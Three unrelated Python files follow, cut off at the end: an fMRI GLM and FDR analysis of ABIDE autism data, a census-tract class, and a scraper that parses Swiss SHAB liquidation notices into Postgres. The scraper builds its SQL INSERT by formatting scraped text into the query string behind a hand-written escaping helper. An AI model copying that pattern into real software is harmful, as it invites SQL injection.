def fdr_correction_and_viz(Pvals_path, Tvals_path, coef_path, mask_path, save_destination, affine, header, combination):
    """FDR-correct the voxelwise p-values and save all statistical maps.

    Loads the (x, y, z, roi) .npy stacks produced by applyGLM, computes
    per-ROI Q-values (Benjamini-Hochberg via fdrcorrection0) inside the
    brain mask, writes per-ROI summary counts (count_voxel_stats) to a
    CSV, and saves P/T/Q/coefficient plus signed -log10(p|q) maps as
    NIfTI files under <save_destination>/<combination>/ using the given
    *affine* and *header*.
    """
    alpha = 0.05  # FDR level
    Pvals = np.load(Pvals_path)
    Tvals= np.load(Tvals_path)
    coeff_vals = np.load(coef_path)
    mask = nib.load(mask_path).get_data()
    brain_indices = np.where(mask != 0 )  # coordinates of in-brain voxels
    # from statsmodels.sandbox.stats.multicomp import fdrcorrection0
    Pvals_shape = Pvals.shape
    Qvals = np.zeros(Pvals_shape)
    # sign(c1-c2) * -1 * log10(p)
    map_logp = np.multiply(np.sign(coeff_vals),(-1*np.log10(Pvals)))
    roi_voxel_stats_matrix = np.zeros((Pvals_shape[3], 14)) # cozthere are 14 statistical attributes
    for roi in range(Pvals_shape[3]):
        print('Computing Stats for ROI: ',roi)
        # pvals = ma.masked_array(Pvals[0], mask = mask, fill_value = 0)
        pvals = Pvals[:,:,:,roi]
        pvals_shape = pvals.shape
        # inp = pvals[~pvals.mask]
        # Flatten inp and check if you get back the original matrix after
        # inp = inp.ravel()
        pvals_list = pvals[brain_indices]
        _, qvals_list = fdrcorrection0(pvals_list,alpha)
        # from IPython.core.debugger import Tracer; Tracer()()
        # map_logq_list = map_logq[brain_indices]
        map_logp_list = map_logp[:,:,:,roi][brain_indices]
        # print("Size of map_logp_list ",map_logp_list.shape)
        # print("Brain Indices: ", brain_indices)
        coeff_vals_list = coeff_vals[:,:,:,roi][brain_indices]
        # Calculate voxel stats using the below function
        Qvals[:,:,:,roi][brain_indices] = qvals_list
        map_logq_list = np.multiply(np.sign(coeff_vals_list),(-1*np.log10(qvals_list)))
        # print("Size of map_logq_list ",map_logq_list.shape)
        roi_voxel_stats_matrix[roi,:] = count_voxel_stats(pvals_list, qvals_list,map_logp_list, map_logq_list)
        # print('Stats Computed for ROI: ',roi)
    # Save the CSV file and the Additional Brain file to visualize
    # sign(c1-c2) * -1 * log10(q)
    map_logq = np.multiply(np.sign(coeff_vals),(-1*np.log10(Qvals)))
    save_destination_new = opj(save_destination,combination)
    if not os.path.exists(save_destination_new):
        os.mkdir(save_destination_new)
    print('Saving Files in directory: ', save_destination_new)
    print('Saving Stats CSV : ',)
    csv_name = opj(save_destination_new,'roi_voxel_stats_' + combination + '.csv')
    np.savetxt(csv_name,roi_voxel_stats_matrix,delimiter=',',header='min_pval,min_qval,p_lt_point_1,p_lt_point_01,\
p_lt_point_05, q_lt_point_1, q_lt_point_01,q_lt_point_05, logq_gt_1point3, logq_gt_1 ,logq_gt_2 ,\
logp_gt_1point3, logp_gt_1, logp_gt_2')
    print('Saving Pvals.nii.gz')
    Pvals_name = opj(save_destination_new,'Pvals.nii.gz')
    Pvals_brain_with_header = nib.Nifti1Image(Pvals, affine= affine,header = header)
    nib.save(Pvals_brain_with_header,Pvals_name)
    print('Saving Tvals.nii.gz')
    Tvals_name = opj(save_destination_new,'Tvals.nii.gz')
    Tvals_brain_with_header = nib.Nifti1Image(Tvals, affine= affine,header = header)
    nib.save(Tvals_brain_with_header,Tvals_name)
    print('Saving Qvals.nii.gz')
    Qvals_name = opj(save_destination_new,'Qvals.nii.gz')
    Qvals_brain_with_header = nib.Nifti1Image(Qvals, affine= affine,header = header)
    nib.save(Qvals_brain_with_header,Qvals_name)
    print('Saving coeff_vals.nii.gz')
    coeff_vals_name = opj(save_destination_new,'coeff_vals.nii.gz')
    coeff_vals_brain_with_header = nib.Nifti1Image(coeff_vals, affine= affine,header = header)
    nib.save(coeff_vals_brain_with_header,coeff_vals_name)
    print('Saving map_logp.nii.gz')
    map_logp_name = opj(save_destination_new,'map_logp.nii.gz')
    map_logp_brain_with_header = nib.Nifti1Image(map_logp, affine= affine,header = header)
    nib.save(map_logp_brain_with_header,map_logp_name)
    print('Saving map_logq.nii.gz')
    map_logq_name = opj(save_destination_new,'map_logq.nii.gz')
    map_logq_brain_with_header = nib.Nifti1Image(map_logq, affine= affine,header = header)
    nib.save(map_logq_brain_with_header,map_logq_name)
# Now construct a function that takes a list of SUB_ID's and returns the FC Maps paths
def get_subject_fc_file(subject_id_list, fc_file_path, bugs):
    """Map subject IDs to their functional-connectivity map paths.

    Parameters
    ----------
    subject_id_list : iterable of int
        SUB_IDs to look up.
    fc_file_path : str
        Path to a .npy file holding an array of FC-map paths; each path
        contains a '_subject_id_<digits>' token.
    bugs : list of str
        Subject IDs (as strings) to exclude from the analysis.

    Returns
    -------
    list
        FC-map paths for every requested subject not listed in *bugs*.
    """
    import re
    return_fc_maps = []
    fc_file_list = np.load(fc_file_path)
    print('Brain files: ',fc_file_list)
    for subject_id in subject_id_list:
        found = False
        for brain in fc_file_list:
            sub_id_extracted = re.search(r'.+_subject_id_(\d+)', brain).group(1)
            if str(subject_id) in bugs:
                # Buggy subject: mark as handled but do not include it.
                found = True
            elif subject_id == int(sub_id_extracted):
                found = True
                return_fc_maps.append(brain)
        if not found:
            # BUG FIX: the original printed sub_id_extracted here, which is
            # unbound when fc_file_list is empty and otherwise refers to the
            # *last* scanned file rather than the missing subject.
            print('Unable to locate Subject so not including in analysis Query: ', int(subject_id))
    return return_fc_maps
# Now construct a function that takes a list of SUB_ID's and returns the FC Maps paths and scores
def get_subject_fc_file_and_score(subid_and_scores_list, fc_file_path, bugs):
    """Map subject IDs to FC-map paths together with their phenotype scores.

    Parameters
    ----------
    subid_and_scores_list : sequence
        [subject-id ndarray, score ndarray or None].  When the second
        element is not an ndarray, falls back to get_subject_fc_file and
        returns paths only.
    fc_file_path : str
        Path to a .npy array of FC-map paths containing
        '_subject_id_<digits>' tokens.
    bugs : list of str
        Subject IDs (as strings) to exclude.

    Returns
    -------
    (list, list)
        Matched FC-map paths and the corresponding scores, in order.
    """
    import re
    subject_id_list = subid_and_scores_list[0].squeeze()
    if isinstance(subid_and_scores_list[1], np.ndarray):
        phenotype_score = subid_and_scores_list[1].squeeze()
    else:
        # No scores supplied: delegate to the path-only lookup.
        return get_subject_fc_file(subject_id_list, fc_file_path, bugs)
    return_fc_maps = []
    return_phenotypic_scores = []
    fc_file_list = np.load(fc_file_path)
    print('Brain files: ',fc_file_list)
    for ix, subject_id in enumerate(subject_id_list):
        found = False
        for brain in fc_file_list:
            sub_id_extracted = re.search(r'.+_subject_id_(\d+)', brain).group(1)
            if str(subject_id) in bugs:
                # Buggy subject: mark as handled but do not include it.
                found = True
            elif subject_id == int(sub_id_extracted):
                found = True
                return_fc_maps.append(brain)
                return_phenotypic_scores.append(phenotype_score[ix])
        if not found:
            # BUG FIX: the original printed sub_id_extracted here, which is
            # unbound when fc_file_list is empty and otherwise refers to the
            # *last* scanned file rather than the missing subject.
            print('Unable to locate Subject: ', int(subject_id))
    return return_fc_maps, return_phenotypic_scores
def applyGLM(subject_list,score_list,mask_path,save_destination, num_proc):
    """Fit a per-voxel OLS (connectivity ~ const + score) across subjects.

    subject_list: per-subject 4-D .npy FC maps (x, y, z, roi), opened with
    mmap to bound memory.  score_list: one phenotype score per subject, in
    the same order.  For every ROI, a pool of *num_proc* workers runs
    calc_score_stats on each in-mask voxel and writes into shared
    (manager-proxy) arrays.  Results are saved to
    <save_destination>/{Pvals,Tvals,coeff_vals}.npy and those three paths
    are returned.
    """
    # Create pool of num_proc workers
    pool = Pool(num_proc)
    mask_data = nib.load(mask_path).get_data()
    # import pdb;pdb.set_trace()
    x,y,z,t = np.load(subject_list[0],mmap_mode='r').shape
    print('Calculating input list to give to workers')
    input_list = [] # for storing the iteration brain coordinates
    counter = 1
    for i in range(x):
        for j in range(y):
            for k in range(z):
                if mask_data[i,j,k] != 0: # Brain region
                    input_list.append([i,j,k,counter])
                    # counter += 1 # for checking progress..
    print('Number of GLMs to be done for each roi= ', len(input_list))
    pvals = np.zeros((x,y,z,t))
    tvals = np.zeros((x,y,z,t))
    coeff_vals = np.zeros((x,y,z,t))
    # Manager provides shared zero arrays the workers can write into.
    m = MyManager()
    m.start()
    print("Starting with the workers")
    # t = 2
    for roi in tqdm(range(t)):
        # print('*****************************************************************')
        # print('Reading the ROI %s npy brain files in mmap mode'%(roi)) # ############# Memory issue .. work with one ROI at a time.
        # print('*****************************************************************')
        brain_npy_handle_list = []
        for in_file in subject_list:
            brain_npy_handle_list.append(np.load(in_file,mmap_mode='r')[:,:,:,roi])
        pvals_shared = m.np_zeros((x,y,z))
        tvals_shared = m.np_zeros((x,y,z))
        coeff_vals_shared = m.np_zeros((x,y,z))
        func = partial(calc_score_stats, brain_npy_handle_list, pvals_shared, tvals_shared, coeff_vals_shared,\
        score_list, roi)
        pool.map(func, input_list)
        # import pdb;pdb.set_trace()
        pvals[:,:,:,roi] = pvals_shared
        tvals[:,:,:,roi] = tvals_shared
        coeff_vals[:,:,:,roi] = coeff_vals_shared
    print('Saving files in ',save_destination)
    if not os.path.exists(save_destination):
        os.makedirs(save_destination) # to create a nested directory structure
    Tvals_path = opj(save_destination,'Tvals')
    Pvals_path = opj(save_destination,'Pvals')
    coeff_vals_path = opj(save_destination,'coeff_vals')
    np.save(Tvals_path,tvals)
    np.save(Pvals_path,pvals)
    np.save(coeff_vals_path,coeff_vals)
    print('Saved')
    return Pvals_path+'.npy', Tvals_path+'.npy', coeff_vals_path+'.npy'
def main(paths, bugs, applyFisher, categoryInfo= None, match=1, motion_param_regression=0, global_signal_regression=0, band_pass_filtering=0, \
         smoothing=0, num_proc = 7):
    """Correlate voxelwise functional connectivity with a phenotypic score.

    Selects autistic subjects with a valid score from the ABIDE phenotype
    file, fits a per-voxel GLM across subjects (applyGLM), then runs FDR
    correction and writes the statistical maps (fdr_correction_and_viz).

    *paths* packs the pipeline directories/files (unpacked positionally
    below); *bugs* lists subject IDs (strings) to exclude.  The
    motion/global/filter/smoothing flags only select which preprocessed
    "combination" folder is read.
    NOTE(review): applyFisher, categoryInfo (other than the None check) and
    match are unused in this code path -- confirm before removing.
    """
    # Unpack the pipeline paths (order fixed by the caller).
    json_path=paths[0]
    base_directory=paths[1]
    motion_correction_bet_directory=paths[2]
    parent_wf_directory=paths[3]
    functional_connectivity_directory=paths[4]
    coreg_reg_directory=paths[5]
    atlas_resize_reg_directory=paths[6]
    subject_list = paths[7]
    datasink_name=paths[8]
    fc_datasink_name=paths[9]
    atlasPath=paths[10]
    brain_path=paths[11]
    mask_path=paths[12]
    atlas_path=paths[13]
    tr_path=paths[14]
    motion_params_path=paths[15]
    func2std_mat_path=paths[16]
    MNI3mm_path=paths[17]
    demographics_file_path = paths[18]
    phenotype_file_path = paths[19]
    data_directory = paths[20]
    # hypothesis_test_dir = paths[21]
    score_corr_dir = paths[23]
    # Runall:
    if categoryInfo == None:
        # phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
        df = pd.read_csv(phenotype_file_path) # , index_col='SUB_ID'
        df = df.sort_values(['SUB_ID'])
        # df = df.sort_values(['SUB+AF8-ID'])
    if bugs == None:
        # Default exclusion list (subjects with missing/partial ROIs).
        bugs = ['51232','51233','51242','51243','51244','51245','51246','51247','51270','51310','50045', '51276', '50746', '50727', '51276']
        # Bugs:
        # 50045 - ROI Missing
        # 51276, 50746, 50727 - Many in between ROIs Missing
        # 51276 - Many in between ROIs Missing
        # '0051242' in bugs
    # selecting Autistic males(DSM IV) of age <= 18 years
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) ]
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 2)] # eyes closed
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=12) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 12-18
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=6) & (df['AGE_AT_SCAN'] <12) & (df['DSM_IV_TR'] == 1) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 6 - lt 12
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 1)] # AGE <= 18
    # In[205]:
    # df_aut_lt18_m.shape
    # In[206]:
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) ]
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 2)] # eyes closed
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=12) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 12- 18
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] >=6) & (df['AGE_AT_SCAN'] <12) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 1)] # eyes open age 6 - lt 12
    # df_td_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0)] # AGE <= 18
    # df_aut_lt18_m = df.loc[(df['SEX'] == 1) & (df['AGE_AT_SCAN'] <=18) & (df['DSM_IV_TR'] == 0) & (df['EYE_STATUS_AT_SCAN'] == 2)] # TD eyes closed
    # In[207]:
    # df_td_lt18_m.shape
    # In[208]:
    # table_males_np = table_males.as_matrix(columns=['SUB_ID','DX_GROUP', 'DSM_IV_TR', 'AGE_AT_SCAN' ,'SEX' ,'EYE_STATUS_AT_SCAN'])
    # In[209]:
    if demographics_file_path == None:
        demographics_file_path = '/home1/varunk/Autism-Connectome-Analysis-brain_connectivity/notebooks/demographics.csv'
    if phenotype_file_path == None:
        phenotype_file_path = '/home1/varunk/data/ABIDE1/RawDataBIDs/composite_phenotypic_file.csv'
    df_demographics = pd.read_csv(demographics_file_path)
    df_phenotype = pd.read_csv(phenotype_file_path)
    df_phenotype = df_phenotype.sort_values(['SUB_ID'])
    # Volume matching
    # print('Volume Matching')
    # volumes_bins = np.array([[0,150],[151,200],[201,250],[251,300]])
    # matched_df_TD = df_phenotype
    # matched_df_AUT = df_phenotype
    # matched_df_TD, matched_df_AUT = matching.volumes_matching(volumes_bins, df_demographics, matched_df_TD, matched_df_AUT)
    #
    # Age 6 - 18 Autistic vs Healthy
    # df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    #
    #
    # df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    # Age 6 - 18 Aspergers vs Healthy
    # df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    #
    #
    # df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    # Age 6 - 18 Aspergers vs Autistic
    # df_td_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    #
    # df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    # ------------------ Only healthy ---------------------------------------
    # healthy_subjects = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    #
    #
    # # import pdb; pdb.set_trace()
    # healthy_subjects = healthy_subjects.reindex(np.random.permutation(healthy_subjects.index))
    #
    # df_td_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
    #
    # df_aut_lt18_m = healthy_subjects[int(healthy_subjects.shape[0]/2.0)+1 :]
    # ------------------ Only healthy again Saity Check---------------------------------------
    # healthy_subjects = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) ]
    #
    # df_td_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
    # df_aut_lt18_m = healthy_subjects[0: int(healthy_subjects.shape[0]/2.0)]
    # Age 12 - 18
    # df_td_lt18_m = matched_df_TD.loc[(matched_df_TD['SEX'] == 1) & (matched_df_TD['DSM_IV_TR'] == 0) \
    # & (matched_df_TD['EYE_STATUS_AT_SCAN'] == 1)
    # & (matched_df_TD['AGE_AT_SCAN'] >= 12 )
    # & (matched_df_TD['AGE_AT_SCAN'] <= 18) ]
    #
    # df_aut_lt18_m = matched_df_AUT.loc[(matched_df_AUT['SEX'] == 1) & (matched_df_AUT['DSM_IV_TR'] == 1) \
    # & (matched_df_AUT['EYE_STATUS_AT_SCAN'] == 1)
    # & (matched_df_AUT['AGE_AT_SCAN'] >= 12 )
    # & (matched_df_AUT['AGE_AT_SCAN'] <= 18) ]
    # Age 6 - 18 Autistic with FIQ score not equal to NAN and -9999
    # Score being correlated; -9999 is the ABIDE "missing value" marker.
    score_name = 'ADI_R_VERBAL_TOTAL_BV'
    print('**************** Correlating score: ',score_name)
    df_aut_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DSM_IV_TR'] == 1) \
    & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) & pd.notnull(df_phenotype[score_name]) & (df_phenotype[score_name] != -9999)]
    # NOTE(review): DataFrame.as_matrix() was removed in pandas 1.0 --
    # replace with .to_numpy()/.values if run on a modern pandas.
    df_aut_subid = df_aut_lt18_m.as_matrix(columns=['SUB_ID'])
    df_aut_score = df_aut_lt18_m.as_matrix(columns=[score_name])
    # Age 6 - 18 Healthy with FIQ score not equal to NAN and -9999
    # score_name = 'FIQ'
    #
    # df_TD_lt18_m = df_phenotype.loc[(df_phenotype['SEX'] == 1) & (df_phenotype['DX_GROUP'] == 2) \
    # & (df_phenotype['EYE_STATUS_AT_SCAN'] == 1) & pd.notnull(df_phenotype[score_name]) & (df_phenotype[score_name] != -9999)]
    #
    #
    # # Fir simplicity of code I am just naming TD as Autistic so that rest of the code doesn't change
    #
    # df_aut_lt18_m = df_TD_lt18_m
    # df_aut_subid = df_aut_lt18_m.as_matrix(columns=['SUB_ID'])
    # df_aut_score = df_aut_lt18_m.as_matrix(columns=[score_name])
    # Folder name encoding the preprocessing variant to read.
    combination = 'motionRegress' + str(int(motion_param_regression)) + \
    'global' + str(int(global_signal_regression)) + 'smoothing' + str(int(smoothing)) +\
    'filt' + str(int(band_pass_filtering))
    print("Combination: ",combination)
    print(motion_param_regression,band_pass_filtering, global_signal_regression, smoothing)
    save_destination = opj(score_corr_dir,combination)
    print('Saving files in ',save_destination)
    if not os.path.exists(save_destination):
        os.makedirs(save_destination) # to create a nested directory structure
    # save_destination_TD = opj(hypothesis_test_dir,combination,'TD_subects.csv')
    save_destination_AUT = opj(score_corr_dir,combination,'AUT_subjects.csv')
    print("Storing the subjects' information used")
    # df_td_lt18_m.to_csv('TD_subects.csv')
    # df_td.to_csv(save_destination_TD)
    # print('Saved TD_subects.csv')
    # df_aut_lt18_m.to_csv('AUT_subjects.csv')
    df_aut_lt18_m.to_csv(save_destination_AUT)
    print('Saved AUT_subects.csv')
    # for motion_param_regression, band_pass_filtering, global_signal_regression, smoothing in itr:
    fc_file_list_nii = opj(base_directory,fc_datasink_name,combination,'fc_map_brain_file_list.npy')
    fc_file_list_npy = opj(base_directory,fc_datasink_name,combination,'fc_map_npy_file_list.npy')
    fc_file_list = fc_file_list_npy
    print('Reading the brain paths from: ',fc_file_list)
    # apply_fisher = True
    # import pdb;pdb.set_trace()
    autistic_list_npy, df_aut_score = (get_subject_fc_file_and_score([df_aut_subid, df_aut_score], fc_file_list, bugs))
    print("Number of autistic participants ", len(autistic_list_npy))
    autistic_list_nii = get_subject_fc_file_and_score([df_aut_subid, None], fc_file_list_nii, bugs)
    # td_list = (get_subject_fc_file(df_td_subid.squeeze(), fc_file_list, bugs))
    # print("Number of TD participants ", len(td_list))
    # participants_considered = min(len(autistic_list), len(td_list))
    # participants_considered = 2
    # print("Number of participants being Considered per group:", participants_considered)
    autistic_list = autistic_list_npy#[0:participants_considered]
    # td_list = td_list#[0:participants_considered]
    # Created the below mask manually using BET
    # mask = opj(base_directory,parent_wf_directory,motion_correction_bet_directory,coreg_reg_directory,'resample_mni/MNI152_T1_2mm_brain_resample_mask.nii.gz')
    # mask = opj(base_directory,parent_wf_directory,motion_correction_bet_directory,coreg_reg_directory,'atlas_resize_reg_directory/resample_atlas/fullbrain_atlas_thr0-2mm_resample_binarize.nii.gz')
    # NOTE(review): hard-coded mask path overrides the paths[12] value above.
    mask_path = '/home1/varunk/atlas/Full_brain_atlas_thr0-2mm/fullbrain_atlas_thr0-3mm_binarized.nii.gz'
    save_destination = opj(score_corr_dir,combination)
    print('Applying GLM in each voxel')
    Pvals_path, Tvals_path, coeff_vals_path = applyGLM(subject_list = autistic_list,score_list=df_aut_score,mask_path=mask_path,save_destination= save_destination,\
    num_proc = num_proc)
    print('Now doing FDR Correctiona and Visualization')
    brain_path = autistic_list_nii[0] # getting a header to be used later to save brain files
    brain_data = nib.load(brain_path)
    affine=brain_data.affine
    header = brain_data.header
    Pvals_path = opj(save_destination,'Pvals.npy')
    Tvals_path = opj(save_destination,'Tvals.npy')
    coeff_vals_path = opj(save_destination,'coeff_vals.npy')
    fdr_correction_and_viz(Pvals_path, Tvals_path, coeff_vals_path, mask_path, save_destination, affine, header, combination )
    # Created above a prarallel proc pipeline that loops over all the brain voxels inside the mask and
    # Create another list of corr values spanning all the subjects
    # Extract FIQ values of the same subjects
    # Use statmodels to caculate the fit of the line and t vals and p vals
|
class Tract:
    """Lightweight copy of a census tract plus district-assignment state."""

    def __init__(self, tract):
        # Copy the identifying fields from the source tract object.
        self.id = tract.id
        self.center = tract.center
        self.population = tract.population

    def initialize_assignment(self):
        """Reset both assignment slots to None."""
        self.prior_assignment = None
        self.new_assignment = None

    def assign_district(self, district):
        """Shift the current assignment into prior and record *district*."""
        self.prior_assignment, self.new_assignment = self.new_assignment, district

    def reassign_district(self, district):
        """Overwrite the current assignment without touching prior."""
        self.new_assignment = district
|
from PyPDF2 import PdfFileReader
import requests
import os
import psycopg2
import datetime
from passwords1 import psql_user, psql_pw, psql_host, psql_port, psql_database
def liq_all_cantons():
    """ Opens the current SHAB pdf and splits the content into entries for each Liquidationsschuldenruf. Then calls save_to_db with these entries. """
    pdf_path = "aktuelle_ausgabe.pdf"
    # Download today's SHAB issue (German edition).
    r = requests.get("https://www.shab.ch/api/v1/archive/issue-of-today?tenant=shab&language=de")
    with open(pdf_path, "wb") as f:
        f.write(r.content)
    pdf = PdfFileReader(pdf_path)
    page_content = ""
    # Concatenate the text of every page except the cover (page 0).
    i = 1
    while i < pdf.getNumPages():
        page_content = page_content + pdf.getPage(i).extractText()
        i += 1
    # Keep only the Liquidationsschuldenrufe section; the section following
    # it differs between issues, hence the two candidate end markers.
    try:
        page_splitted = page_content[page_content.index("Liquidationsschuldenrufe"):page_content.index("Weitere gesellschaftsrechtliche Schuldenrufe")]
    except:
        page_splitted = page_content[page_content.index("Liquidationsschuldenrufe"):page_content.index("Schuldbetreibungen")]
    page_splitted = page_splitted[1:]
    content_list = []
    # split_content raises ValueError when no further keyword is found; the
    # excepts below use that to terminate.  The prepended "L" restores the
    # first letter consumed by the [1:] slices above.
    while True:
        try:
            x, y = split_content(page_splitted)
            content_list.append("L"+x)
            page_splitted = y[1:]
        except:
            try:
                x = page_splitted
                content_list.append("L"+x)
                break
            except:
                break
    os.remove(pdf_path)
    save_to_db(content_list)
def split_content(page_splitted):
    """Split *page_splitted* at the first 'Liquidationsschuldenruf'.

    Returns (text before the keyword, keyword plus remainder).  Raises
    ValueError when the keyword is absent -- liq_all_cantons relies on
    that exception to terminate its loop.
    """
    cut = page_splitted.index("Liquidationsschuldenruf")
    return page_splitted[:cut], page_splitted[cut:]
def save_to_db(x):
    """Build one multi-row INSERT ... ON CONFLICT upsert from the parsed
    SHAB entries produced by liq_all_cantons() and execute it.

    Entries for which create_values_command returns None (no company name)
    are skipped; when no entry at all yields values, nothing is executed.
    """
    if len(x) == 0:
        print("save_to_db:: received list was empty")
        return
    i = 0
    VALUES = None
    j = 0
    print(len(x))
    # Find the first entry that yields a usable VALUES tuple.
    while VALUES is None and i < len(x):
        print(j)
        j += 1
        VALUES = create_values_command(x[i])
        i += 1
    # BUG FIX: the original tested `if i == len(x): return`, which also
    # fired when the *last* entry produced a valid VALUES tuple, silently
    # discarding the whole insert.  Only bail out when nothing was found.
    if VALUES is None:
        print("save_to_db:: no elements found with non null names")
        return
    # Append the remaining entries that parse successfully.
    for k in x[i:]:
        print(str(j) + "*")
        j += 1
        value = create_values_command(k)
        if value is not None:
            VALUES += ", " + value
    query_no_fetch("INSERT INTO liquidations VALUES {} ON CONFLICT (name) DO UPDATE SET type=EXCLUDED.type, name=EXCLUDED.name, che=EXCLUDED.che, date=EXCLUDED.date, contact=EXCLUDED.contact, insertdate=EXCLUDED.insertdate;".format(VALUES))
def create_values_command(i):
    """Build one SQL VALUES tuple string from a raw publication-text entry.

    i -- one text block cut out of the SHAB PDF by the caller.

    Extracted fields (all optional except the company name):
      a -- publication counter, e.g. "3. Veröffentlichung" (slice around the marker)
      b -- company name (text between the two fixed markers); REQUIRED:
           if it is missing the entry is unusable and None is returned
      c -- CHE company identifier; looked up via the Zefix API when absent
      d -- deadline date parsed from "Ablauf der Frist"
      e -- contact information, trimmed before any trailing sections

    Returns a string like "('...', '...', ..., '...')" suitable for an
    INSERT ... VALUES list, or None when no company name was found.
    """
    a,b,c,d,e = None, None, None, None, None
    # Publication counter: 3 chars before the marker + the marker itself.
    try:
        a = i[i.index("Veröffentlichung") -3 : i.index("Veröffentlichung") + 16]
    except:
        pass
    # Company name between the two fixed section headers; mandatory.
    try:
        b = i[i.index("Liquidationsschuldenruf") + 24 : i.index("Aufgelöstes Unternehmen") - 21]
    except:
        return None
    # CHE id has the fixed printed width "CHE-xxx.xxx.xxx" (15 chars).
    try:
        c = i[i.index("CHE-") : i.index("CHE-") + 15]
    except:
        pass
    if c == None:
        # Fallback: query the Zefix company register by name for the UID and
        # reformat the 12-char UID into the dotted CHE notation.
        try:
            r = requests.post("https://www.zefix.ch/ZefixREST/api/v1/firm/search.json", json={"name":b ,"languageKey":"de", "maxEntries":1})
            x = r.json()["list"][0]["uid"]
            c = x[0:3] + "-" + x[3:6] + "." + x[6:9] + "." + x[9:12]
        except Exception as e:
            print(str(e))
            pass
    # Deadline: 10-char dd.mm.YYYY date printed 18 chars after the marker.
    # NOTE(review): `except ... as e` shadows the contact variable `e` and
    # Python 3 deletes `e` when the handler exits -- if "Kontaktstelle" is
    # also missing below, the later `e.index(...)`/make_safe(e) calls can hit
    # an unbound name.  Confirm and rename this exception variable.
    try:
        d = datetime.datetime.strptime(i[i.index("Ablauf der Frist") + 18: i.index("Ablauf der Frist") + 28], "%d.%m.%Y")
    except Exception as e:
        print(str(e))
        pass
    # Contact block: everything after the "Kontaktstelle" heading ...
    try:
        e = i[i.index("Kontaktstelle") + 15 : ]
    except:
        pass
    # ... trimmed before optional trailing sections, when present.
    try:
        e = e[ : e.index("Bemerkungen") - 1]
    except:
        pass
    try:
        e = e[ : e.index("Hinweise zur Rechtsgültigkeit") - 1]
    except:
        pass
    if d == None:
        # No explicit deadline: for a third publication, assume 30 days from
        # today; otherwise store NULL for the date column.
        if a == "3. Veröffentlichung":
            date = datetime.datetime.now() + datetime.timedelta(30)
            return "({}, {}, {}, '{}', {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), date.strftime('%Y-%m-%d'), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
        return "({}, {}, {}, null, {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
    else:
        return "({}, {}, {}, '{}', {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), d.strftime('%Y-%m-%d'), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
def make_safe(s):
    """Return *s* as a single-quoted SQL string literal, or the literal ``null``.

    Single quotes inside the value are doubled per SQL escaping rules so the
